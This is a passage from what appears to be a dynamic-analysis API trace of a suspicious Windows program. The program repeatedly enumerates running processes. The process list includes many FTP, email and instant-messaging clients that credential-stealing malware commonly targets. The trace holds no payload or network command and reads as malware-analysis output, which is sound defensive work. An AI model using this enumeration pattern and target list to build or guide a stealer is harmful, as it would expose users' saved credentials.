th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.994] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0252.996] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.999] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0253.003] CloseHandle (hObject=0x2060) returned 1 [0253.003] Sleep (dwMilliseconds=0x64) [0253.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0253.119] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.121] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.124] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.126] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.129] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.131] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.134] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.137] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.139] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.144] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.171] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.174] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.176] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.179] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.182] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.184] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.187] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.190] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.192] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.195] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.197] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0253.199] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.202] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0253.207] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.226] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0253.229] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0253.232] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0253.235] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0253.238] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0253.241] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0253.243] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.246] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.249] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0253.252] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.254] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.262] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.267] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.270] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.272] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0253.275] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0253.278] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0253.280] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0253.284] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0253.286] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0253.289] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0253.292] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0253.294] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0253.296] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0253.299] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0253.308] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0253.310] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0253.313] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0253.315] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0253.317] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0253.319] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0253.321] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0253.323] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0253.326] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0253.329] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0253.332] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0253.335] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0253.338] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0253.340] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0253.345] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0253.348] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0253.350] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0253.355] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0253.359] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0253.362] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0253.365] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0253.368] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0253.370] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0253.373] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0253.376] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0253.379] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0253.390] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0253.393] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0253.397] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0253.400] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0253.405] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0253.407] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0253.411] Process32Next (in: 